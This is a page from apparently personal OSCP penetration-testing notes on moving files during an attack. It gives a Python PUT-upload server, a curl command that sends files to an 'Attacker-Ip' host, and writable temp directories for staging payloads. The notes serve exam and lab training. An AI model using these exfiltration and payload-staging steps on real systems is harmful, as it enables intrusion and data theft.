OSCP Notes
  • Introduction
  • Port Scanning
  • Nmap Port Scanning
  • Nmap Scripts
  • Services Enumeration
    • SMB Enumeration (Port 139, 445)
    • SNMP Enumeraion (Port 161)
    • NFS Enumeration (Port 111, 2049)
    • SMTP Enumeration (Port 25)
    • DNS Enumeration (Port 53)
    • POP3 (Port 110, 25*)
    • MySQL (Port 3306)
    • Oracle (Port 1521)
    • MsSQL (Port 1433)
  • Web / HTTP
    • Web Scanning
    • CMS
    • Directory Fuzzing
    • File Upload
      • Bypass file upload filtering
      • Bruteforcing extensions
      • WebDAV
    • Bruteforce Authentication
    • LFI and RFI
      • Interesting Files for LFI
      • Null Byte Injection
      • PHP Wrappers
    • ShellShock
    • Post Requests
  • password attacks
    • Brute-force service password
    • Cracking Password
    • Custom Worldlist
  • Exploitaion
    • Searchsploit
    • Compiling the Exploit
  • shell
    • Bind and Reverse shell
    • Upgrading shell
    • msfvenom
  • Linux Post Exploitation
    • Linux Manual Exploitation
    • Linux post exploitation scripts
    • Kernel Exploitation
  • windows post exploitation
    • General
    • Manual Exploitaion
    • Dumping the sam file
    • SUDO SU
    • Automated enumeration script
    • Windows Exploit Suggester
  • file transfer
    • General
    • Linux
    • Windows
  • cheatsheets
    • Command injection Cheatsheet
    • Find Command Cheatsheet
    • Netcat
    • SQL Injection Bypass
    • CheckList
    • XSS Payload
Powered by GitBook
On this page
  • Setup HTTP Server
  • Advance http server supporting upload method
  • Temp File location
  • Linux
  • Windows
  1. file transfer

General

Setup HTTP Server

python -m SimpleHTTPServer

python3 -m http.server

Advance http server supporting upload method

  • first put this code into py file and save it

import SimpleHTTPServer
import BaseHTTPServer

class SputHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
     def do_PUT(self):
         print self.headers
         length = int(self.headers["Content-Length"])
         path = self.translate_path(self.path)
         with open(path, "wb") as dst:
             dst.write(self.rfile.read(length))

if __name__ == '__main__':
    SimpleHTTPServer.test(HandlerClass=SputHTTPRequestHandler)

  • after that run it with python2 it will spin up the web server on port 8000 ,

  • now you can upload file to attacker box with following command

curl -T file http://Attacker-Ip:8000

Temp File location

generally temp file has writable permission , so we can use it to downlaod and execute our payloads

Linux

/tmp

/dev/shm

Windows

%systemdrive%\Windows\Temp

%userprofile%\AppData\Local\Temp
PreviousWindows Exploit SuggesterNextLinux

Last updated 3 years ago